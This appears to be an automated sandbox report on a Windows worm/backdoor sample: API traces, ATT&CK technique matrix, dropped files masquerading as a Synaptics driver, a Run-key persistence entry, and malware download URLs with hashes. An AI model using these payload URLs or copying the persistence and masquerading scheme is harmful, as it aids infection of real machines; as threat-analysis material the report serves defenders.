                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01004F6B InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetCurrentDirectoryA,GetSystemDirectoryA,QueryDosDeviceA,_strlwr,strstr,strstr,strstr,GetDiskFreeSpaceA,CryptAcquireContextA,sprintf,CryptGenRandom,sprintf,sprintf,CryptReleaseContext,GetSystemTime,SystemTimeToFileTime,DialogBoxParamA,DosDateTimeToFileTime,LocalFileTimeToFileTime,SetFileTime,CloseHandle,SendDlgItemMessageA,MoveFileExA,strstr,_stricmp,SendDlgItemMessageA,GetLastError,CreateFileA,SetFilePointer,SetFilePointer,SetEndOfFile,SetFilePointer,2_2_01004F6B
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01003D02 AllocateAndInitializeSid,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLengthSid,GetTokenInformation,GetLengthSid,2_2_01003D02
                              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01004F6B InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetCurrentDirectoryA,GetSystemDirectoryA,QueryDosDeviceA,_strlwr,strstr,strstr,strstr,GetDiskFreeSpaceA,CryptAcquireContextA,sprintf,CryptGenRandom,sprintf,sprintf,CryptReleaseContext,GetSystemTime,SystemTimeToFileTime,DialogBoxParamA,DosDateTimeToFileTime,LocalFileTimeToFileTime,SetFileTime,CloseHandle,SendDlgItemMessageA,MoveFileExA,strstr,_stricmp,SendDlgItemMessageA,GetLastError,CreateFileA,SetFilePointer,SetFilePointer,SetEndOfFile,SetFilePointer,2_2_01004F6B
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8F7B40 __EH_prolog3_GS,GetCommandLineW,_memset,GetTimeZoneInformation,GetThreadLocale,4_2_6C8F7B40
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01003972 OpenEventA,WaitForSingleObject,CloseHandle,Sleep,LoadLibraryA,GetProcAddress,WaitForSingleObject,GetLastError,InitiateSystemShutdownA,GetLastError,WaitForSingleObject,GetLastError,GetVersionExA,GetVersionExA,GetVersionExA,GetSystemDirectoryA,strchr,CreateFileA,FlushFileBuffers,CloseHandle,NtShutdownSystem,FreeLibrary,2_2_01003972
                              Source: C:\Users\user\Desktop\._cache_file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                              Source: Amcache.hve.17.drBinary or memory string: msmpeng.exe
                              Source: Amcache.hve.17.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                              Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                              Source: Amcache.hve.17.drBinary or memory string: MsMpEng.exe

                              Stealing of Sensitive Information

                              Source: Yara matchFile source: file.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7712, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX3CE.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\AFWAAFRXKO\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exeDirectory queried: C:\Users\user\Documents

                              Remote Access Functionality

                              Source: Yara matchFile source: file.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7712, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX3CE.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\AFWAAFRXKO\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                              Gather Victim Identity Information | 41 Scripting | 1 Replication Through Removable Media | 2 Native API | 41 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                              Credentials | Domains | Default Accounts | 3 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Extra Window Memory Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Peripheral Device Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                              Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | 11 Windows Service | 1 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 14 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                              Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Registry Run Keys / Startup Folder | 11 Windows Service | 1 DLL Side-Loading | NTDS | 18 System Information Discovery | Distributed Component Object Model | Input Capture | 34 Application Layer Protocol | Traffic Duplication | Data Destruction
                              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 11 Process Injection | 1 Extra Window Memory Injection | LSA Secrets | 131 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Registry Run Keys / Startup Folder | 22 Masquerading | Cached Domain Credentials | 11 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Virtualization/Sandbox Evasion | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                              Behavior Graph ID: 1583477 Sample: file.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100
                              Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 13 other signatures
                              Domains: freedns.afraid.org (Uses dynamic DNS services); xred.mooo.com; 4 other IPs or domains
                              Processes started: file.exe; EXCEL.EXE; Synaptics.exe
                              file.exe dropped: C:\ProgramData\Synaptics\Synaptics.exe, PE32; C:\ProgramData\Synaptics\RCX3CE.tmp, PE32; C:\...\Synaptics.exe:Zone.Identifier, ASCII; C:\Users\user\Desktop\._cache_file.exe, PE32
                              file.exe started: Synaptics.exe; ._cache_file.exe
                              Synaptics.exe DNS/IP: docs.google.com 172.217.18.14, 443, 49788, 49789 GOOGLEUS United States; drive.usercontent.google.com 216.58.206.65, 443, 49803, 49805 GOOGLEUS United States; freedns.afraid.org 69.42.215.252, 49797, 80 AWKNET-LLCUS United States
                              Synaptics.exe dropped: C:\Users\user\Documents\AFWAAFRXKO\~$cache1, PE32
                              Synaptics.exe signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Drops PE files to the document folder of the user; Machine Learning detection for dropped file
                              Synaptics.exe started: WerFault.exe
                              ._cache_file.exe dropped: C:\...\sqmapi.dll, PE32; C:\...\SetupUi.dll, PE32; C:\...\SetupEngine.dll, PE32; 11 other files (none is malicious)
                              ._cache_file.exe started: Setup.exe
                              Setup.exe started: wordpad.exe; wordpad.exe
                              wordpad.exe started: splwow64.exe

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| file.exe | 92% | ReversingLabs | Win32.Worm.Zorex | |
| file.exe | 100% | Avira | TR/Dldr.Agent.SH | |
| file.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 | |
| file.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\ProgramData\Synaptics\RCX3CE.tmp | 100% | Avira | TR/Dldr.Agent.SH | |
| C:\ProgramData\Synaptics\RCX3CE.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 | |
| C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH | |
| C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 | |
| C:\ProgramData\Synaptics\RCX3CE.tmp | 100% | Joe Sandbox ML | | |
| C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML | | |
| C:\36a8a8e2fed651ec27d1eed188bb35\1028\SetupResources.dll | 0% | ReversingLabs | | |
| C:\36a8a8e2fed651ec27d1eed188bb35\1031\SetupResources.dll | 0% | ReversingLabs | | |
| C:\36a8a8e2fed651ec27d1eed188bb35\1033\SetupResources.dll | 0% | ReversingLabs | | |
| C:\36a8a8e2fed651ec27d1eed188bb35\1036\SetupResources.dll | 0% | ReversingLabs | | |
| C:\36a8a8e2fed651ec27d1eed188bb35\1040\SetupResources.dll | 0% | ReversingLabs | | |
| C:\36a8a8e2fed651ec27d1eed188bb35\1041\SetupResources.dll | 0% | ReversingLabs | | |
| C:\36a8a8e2fed651ec27d1eed188bb35\1042\SetupResources.dll | 0% | ReversingLabs | | |
| C:\36a8a8e2fed651ec27d1eed188bb35\1049\SetupResources.dll | 0% | ReversingLabs | | |
| C:\36a8a8e2fed651ec27d1eed188bb35\2052\SetupResources.dll | 0% | ReversingLabs | | |
| C:\36a8a8e2fed651ec27d1eed188bb35\3082\SetupResources.dll | 0% | ReversingLabs | | |
| C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe | 0% | ReversingLabs | | |
| C:\36a8a8e2fed651ec27d1eed188bb35\SetupEngine.dll | 0% | ReversingLabs | | |
| C:\36a8a8e2fed651ec27d1eed188bb35\SetupUi.dll | 0% | ReversingLabs | | |
| C:\36a8a8e2fed651ec27d1eed188bb35\sqmapi.dll | 0% | ReversingLabs | | |
| C:\ProgramData\Synaptics\RCX3CE.tmp | 94% | ReversingLabs | Win32.Backdoor.DarkComet | |
| C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Worm.Zorex | |
| C:\Users\user\Desktop\._cache_file.exe | 0% | ReversingLabs | | |
| C:\Users\user\Documents\AFWAAFRXKO\~$cache1 | 94% | ReversingLabs | Win32.Backdoor.DarkComet | |

No Antivirus matches

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://xred.site50.net/syn/SUpdate.iniZ | 100% | Avira URL Cloud | malware | |
| http://xred.site50.net/syn/SUpdate.iniH)k | 100% | Avira URL Cloud | malware | |
| https://drive.use | 0% | Avira URL Cloud | safe | |
| http://xred.site50.net/syn/Synaptics.rarZ | 100% | Avira URL Cloud | malware | |
| http://xred.site50.net/syn/SSLLibrary.dlp | 100% | Avira URL Cloud | malware | |
| http://xred.site50.net/syn/SSLLibrary.dll6 | 100% | Avira URL Cloud | malware | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| freedns.afraid.org | 69.42.215.252 | true | false | | high |
| docs.google.com | 172.217.18.14 | true | false | | high |
| s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high |
| drive.usercontent.google.com | 216.58.206.65 | true | false | | high |
| xred.mooo.com | unknown | unknown | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| xred.mooo.com | false | | high |
| http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://xred.site50.net/syn/SSLLibrary.dll6 | Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| https://drive.use | Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1: | Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| http://xred.site50.net/syn/Synaptics.rarZ | Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1 | Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | false | | high |
| https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1 | Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | false | | high |
| https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1 | Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | false | | high |
| http://xred.site50.net/syn/SUpdate.iniZ | Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8 | file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| http://xred.site50.net/syn/SUpdate.ini | Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | false | | high |
| http://xred.site50.net/syn/SSLLibrary.dlp | file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1: | Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16 | Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| http://xred.site50.net/syn/SUpdate.iniH)k | file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| https://drive.usercontent.google.com/ | Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://xred.site50.net/syn/Synaptics.rar | Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | false | | high |
| https://docs.google.com/uc?id=0; | Synaptics.exe, 00000003.00000002.2033802566.000000001A93E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2004023076.000000000ACBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2027067816.00000000156BE000.00000004.00000010.00020000.00000000.sdmp | false | | high |
| http://xred.site50.net/syn/SSLLibrary.dll | Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | false | | high |
| https://docs.google.com/ | Synaptics.exe, 00000003.00000002.1980458813.0000000000591000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2014101336.000000000EA0A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006B05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl | file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 172.217.18.14 | docs.google.com | United States | | 15169 | GOOGLEUS | false |
| 216.58.206.65 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false |
| 69.42.215.252 | freedns.afraid.org | United States | | 17048 | AWKNET-LLCUS | false |
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1583477
                                                                        Start date and time:2025-01-02 20:28:32 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 8m 57s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:21
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Sample name:file.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.expl.evad.winEXE@16/120@11/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 66.7%
                                                                        HCA Information:
                                                                        • Successful, ratio: 89%
                                                                        • Number of executed functions: 215
                                                                        • Number of non-executed functions: 198
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 52.109.32.97, 184.28.90.27, 52.113.194.132, 20.189.173.17, 20.42.73.29, 13.107.246.45, 20.190.160.17, 4.245.163.56
                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, onedscolprdwus22.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, login.live.com, e16604.g.akamaiedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                        • Execution Graph export aborted for target Synaptics.exe, PID 7712 because there are no executed function
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                        • VT rate limit hit for: file.exe
| Time | Type | Description |
|---|---|---|
| 14:29:35 | API Interceptor | 381x Sleep call for process: Synaptics.exe modified |
| 14:29:48 | API Interceptor | 1327237x Sleep call for process: splwow64.exe modified |
| 14:29:51 | API Interceptor | 1x Sleep call for process: wordpad.exe modified |
| 14:30:27 | API Interceptor | 1x Sleep call for process: WerFault.exe modified |
| 19:29:29 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe |
Match: C:\36a8a8e2fed651ec27d1eed188bb35\1028\SetupResources.dll
Associated Sample Name / URL | Detection | Threat Name
Auu2j0pT0B.exe | malicious | Unknown
WIN_SCM_RDM_INSTALL_4.0.4.0.EXE | malicious | Unknown
WIN_SCM_RDM_INSTALL_4.0.4.0.EXE | malicious | Unknown
https://storage.googleapis.com/vectric_public/Cut2DDesktopTrialEdition_Setup.exe | malicious | Unknown
https://download.info.apple.com/Mac_OS_X/031-30890-20150812-ea191174-4130-11e5-a125-930911ba098f/bootcamp5.1.5769.zip | malicious | Unknown
Kiwi_Syslog_Server_9.8.2.Freeware.setup.exe | malicious | Unknown
ESjy0irMIn.exe | malicious | Njrat
dotNetFx40_Full_setup.exe | malicious | Phemedrone Stealer
Scotiabank_Scanner_Driver_DigitalCheck-42180-1310v3.exe | malicious | Unknown
http://download.arxivar.it/Tools/Prerequisiti/vcredist_x86_2010.zip | malicious | Unknown
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (388), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):30672
                                                                                            Entropy (8bit):4.293519557838441
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:4Y2C7xDsxgg8MPN9AYy50keJzH7o3oDPnv:cxTJz7
                                                                                            MD5:12DF3535E4C4EF95A8CB03FD509B5874
                                                                                            SHA1:90B1F87BA02C1C89C159EBF0E1E700892B85DC39
                                                                                            SHA-256:1C8132747DC33CCDB02345CBE706E65089A88FE32CF040684CA0D72BB9105119
                                                                                            SHA-512:C6C8887E7023C4C1CBF849EEBD17B6AD68FC14607D1C32C0D384F951E07BFAF6B61E0639F4E5978C9E3E1D52EF8A383B62622018A26FA4066EB620F584030808
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):14168
                                                                                            Entropy (8bit):5.9724110685335825
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:fc2+tUfwZWPl53LmlVlSW1g+/axw0lczWpXEWUQKPnEtObMacxc8hjeyveCXzHbk:hzuwLmlCW1g+/kmzWpXEWULXci2jpv3e
                                                                                            MD5:7C136B92983CEC25F85336056E45F3E8
                                                                                            SHA1:0BB527E7004601E920E2AAC467518126E5352618
                                                                                            SHA-256:F2E8CA58FA8D8E694D04E14404DEC4E8EA5F231D3F2E5C2F915BD7914849EB2B
                                                                                            SHA-512:06DA50DDB2C5F83E6E4B4313CBDAE14EED227EEC85F94024A185C2D7F535B6A68E79337557727B2B40A39739C66D526968AAEDBCFEF04DAB09DC0426CFBEFBF4
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
• Filename: Auu2j0pT0B.exe, Detection: malicious
• Filename: WIN_SCM_RDM_INSTALL_4.0.4.0.EXE, Detection: malicious
• Filename: WIN_SCM_RDM_INSTALL_4.0.4.0.EXE, Detection: malicious
• Filename: , Detection: malicious
• Filename: , Detection: malicious
• Filename: Kiwi_Syslog_Server_9.8.2.Freeware.setup.exe, Detection: malicious
• Filename: ESjy0irMIn.exe, Detection: malicious
• Filename: dotNetFx40_Full_setup.exe, Detection: malicious
• Filename: Scotiabank_Scanner_Driver_DigitalCheck-42180-1310v3.exe, Detection: malicious
• Filename: , Detection: malicious
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):188446
                                                                                            Entropy (8bit):4.98936861773382
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:vjB8N7T+SN6FY5PmQlivKawlrIMUkYfkv8CshgJNgRJAoJvIrOJBElrhzxQXK6uG:o7SSN6FYtmQlivKawlrIMUkYfkv8Cs4U
                                                                                            MD5:129D8E8824B0D545ADC29E571A6E2C02
                                                                                            SHA1:5A1DDFCD2AE21D96C818D315CB5E263F525A39CD
                                                                                            SHA-256:83B8268E2874699227F9B1AD3F72A06CBF474EFA3983F5C5EE9BFE415DB98476
                                                                                            SHA-512:1048F646D5866DC8736DB0A023A65A7E208A5F56774FA8EC5D59E4272A54A9A6E94B01B84293A7EC9F889BAD7865522E783AF30BF61BB9249687DCEAC62066D8
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (615), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):41628
                                                                                            Entropy (8bit):3.5773894743757726
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:4nh+jpoHHZi8oO0GOJ2+8q6OQzxYJL/ZiITrKv:R03zzOJL/YIy
                                                                                            MD5:B13FF959ADC5C3E9C4BA4C4A76244464
                                                                                            SHA1:4DF793626F41B92A5BC7C54757658CE30FDAEEB1
                                                                                            SHA-256:44945BC0BA4BE653D07F53E736557C51164224C8EC4E4672DFAE1280260BA73B
                                                                                            SHA-512:DE78542D3BBC4C46871A8AFB50FB408A59A76F6ED67E8BE3CBA8BA41724EA08DF36400E233551B329277A7A0FE6168C5556ABE9D9A735F41B29A941250BFC4D6
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):18776
                                                                                            Entropy (8bit):5.135663555520085
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:lQ16m3rhGrcHN/USYvYVA9WKieW8bLXci2jXHU2Ze:lEhCSVYvYVAA+Mi2jXHU2A
                                                                                            MD5:7C9AE49B3A400C728A55DD1CACC8FFB2
                                                                                            SHA1:DD3A370F541010AD650F4F6AA42E0CFC68A00E66
                                                                                            SHA-256:402C796FEBCD78ACE8F1C5975E39193CFF77F891CFF4D32F463F9A9C83806D4A
                                                                                            SHA-512:D30FE9F78A49C533BE5C00D88B8C2E66A8DFAC6D1EAE94A230CD937F0893F6D4A0EECE59C1D2C3C8126FFA9A9648EC55A94E248CD8C7F9677F45C231F84F221B
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):163866
                                                                                            Entropy (8bit):5.029712171633306
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:oiJ+vgRJA8J/snalBEm0OgKXIJR10GZybh2C:aQ
                                                                                            MD5:117DABB5A055B09B6DB6BCBA8F911073
                                                                                            SHA1:E8F5D907939400824CC5DADB681852C35CA7BB79
                                                                                            SHA-256:DAEA9CD8151A2C24A87C3254DEC1DE0463234E44922C8E0AA4E01AB58EC89664
                                                                                            SHA-512:E995D03998BE9F07F9E9B8566E429D3795ADBDEEEFB2048D6B8877CE15A0ABFCE4FAAEE8DC773250495C15CC35FD0040D81593B51067533836D5F3CF8612D3C4
                                                                                            Malicious:false
